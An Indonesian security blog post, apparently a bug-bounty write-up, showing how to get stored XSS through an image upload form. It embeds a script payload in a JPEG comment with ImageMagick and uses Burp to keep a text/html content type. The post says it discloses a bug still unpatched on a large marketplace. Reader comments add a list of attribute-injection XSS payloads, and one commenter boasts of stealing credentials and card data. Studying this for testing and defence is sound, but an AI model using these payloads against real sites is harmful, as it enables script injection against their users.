• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

MIME Type Sniffing pada Form Upload Gambar

June 21, 2019 by Jack Wilder 10 Comments

MIME Type Sniffing pada Form Upload Gambar. Oke kali ini saya akan membahas mengenai cara mengeksploitasi form upload pada sebuah web sehingga memunculkan XSS. Kita bisa memodifikasi request saat melakukan upload (mirip seperti tamper data), hanya saja nantinya yang kita modifikasi adalah mime type nya.

Saya menemukan bug ini pada salahsatu marketplace besar di Indonesia. Namun ketika saya laporkan bugnya, ternyata duplicate. Tapi kampangnya, meski duplicate bug nya masih saya tidak dipatch, padahal kalau dihitung hitung sudah sekitar dua bulan yang lalu saya lapor. Berarti (jika memang bug tersebut duplicate), pihak security marketplace lebih dari dua bulan sudah mengetahui bug tersebut terhitung dari pelapor pertama.

Oke karena mungkin pihak marketplace tersebut tidak menganggap ini sebagai bug, saya sharing saja disini bagaimana PoC nya.

Pertama, kita butuh tool ImageMagick. Ini untuk menyisipkan payload XSS kita kedalam gambar. Intinya, payload disini tidak bisa langsung disisipkan kedalam gambar dengan cara kita membuka file gambar dengan teks editor, menambahkan script XSS di paling bawah, kemudian menyimpan gambarnya kembali. File gambar tersebut akan terdeteksi sebagai file corrupt saat diupload.

Oke balik lagi ke topik, pertama, kita harus menyediakan gambar “murni” yang akan kita sisipi payload. Murni disini dalam artian gambar tersebut masih bersih tanpa ada inject payload didalamnya.

Sebagai contoh, kita gunakan gambar dedek sejuta umat berikut:

Oh iya pastikan kalian sudah menginstall imagemagick. Di Debian dan Ubuntu serta turunannya, gunakan perintah

sudo apt-get update && sudo apt-get install imagemagick

Untuk menginstall imagemagick.

Selanjutnya kita sisipkan payload kita kedalam gambar dalam bentuk comment.

wget https://exploit.linuxsec.org/wp-content/uploads/2019/06/sagiri.jpg
convert sagiri.jpg -set comment '<script>alert(document.domain);</script>' izumi.jpg
mv izumi.jpg izumi.jpg.html

Selanjutnya kita upload file izumi.jpg.html tersebut lewat form upload.

Sebelumnya, kita siapkan juga Burp Suite atau apapun itu yang bisa digunakan untuk memodifikasi request. Namun disini saya menggunakan Burp. Kita ubah ekstensi gambar dari html ke jpg. Namun biarkan content-type tetap text/html.

Ubah ekstensi file nya

Jika memang web nya vuln, maka gambar akan sukses terupload. Dan jika diakses, script XSS akan muncul.

Saat dicek content type nya pun html

Oke mungkin itu saja writeup kali ini, semoga bermanfaat.

Shares

Filed Under: Web Hacking, XSS

Reader Interactions

Comments

  1. Muhammad Tegar says

    June 24, 2019 at 5:03 pm

    Mas saya sudah ikutin tutor ini dan saya upload divps pribadi saya tp kenapa tetap terbaca image/jpeg ya dari responennya?

    Reply
  2. tst says

    July 19, 2019 at 11:09 pm

    alert(1);
    javascript:alert(1);

    Reply
  3. test says

    July 27, 2019 at 10:11 am

    `”autofocus onfocus=”alert(1)`
    `”autofocus onfocus=alert(1)//`
    `”onbeforescriptexecute=alert(1)//`
    `”onmouseover=”alert(1)//` (Interaction)
    `”autofocus onblur=”alert(1)` (Interaction)
    `’autofocus onfocus=’alert(1)`
    `’autofocus onfocus=alert(1)//`
    `’onbeforescriptexecute=alert(1)//`
    `’onmouseover=’alert(1)//` (Interaction)
    `’autofocus onblur=’alert(1)` (Interaction)
    `aaaa autofocus onfocus=alert(1)//`
    `aaaa onbeforescriptexecute=alert(1)//`
    `aaaa onmouseover=alert(1)//`

    Reply
  4. xjxk says

    July 27, 2019 at 10:11 am

    test

    Reply
  5. testi says

    July 27, 2019 at 10:12 am

    yest

    Reply
  6. Pria Idaman says

    October 19, 2019 at 11:00 pm

    menurut saya sih exploit tanpa upload shell ora uwu min ,,, rugi pentester-nya lagian kepuasan apa coba yang di dapat ya toh index gak ditebas – user / pass gak di dapat – CC juga gak di dapat halah mnding jaga warnet

    Reply
    • Cewe idaman says

      January 21, 2020 at 7:33 am

      Apaansi bego

      Reply
    • XXC says

      January 25, 2020 at 1:38 am

      IDIOT

      Reply
  7. Danur says

    April 7, 2020 at 11:05 am

    ada notif
    library “libwebpmux.so” not found

    itu kenapa bang?

    Reply
  8. Pentester says

    November 11, 2022 at 4:40 pm

    gw pake method ini dapet $200 dari zoho
    thanks min

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Surge.sh Custom Domain or Subdomain Takeover

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Cracking FTP Password using Hydra on BackBox Linux

WordPress 4.7.0/4.7.1 Content Injection Exploit

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Cara Mudah Hack cPanel dengan Fitur Reset Password

Reverse Shell From Local File Inclusion Exploit

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

LinuxSec / 76 queries in 0.11 seconds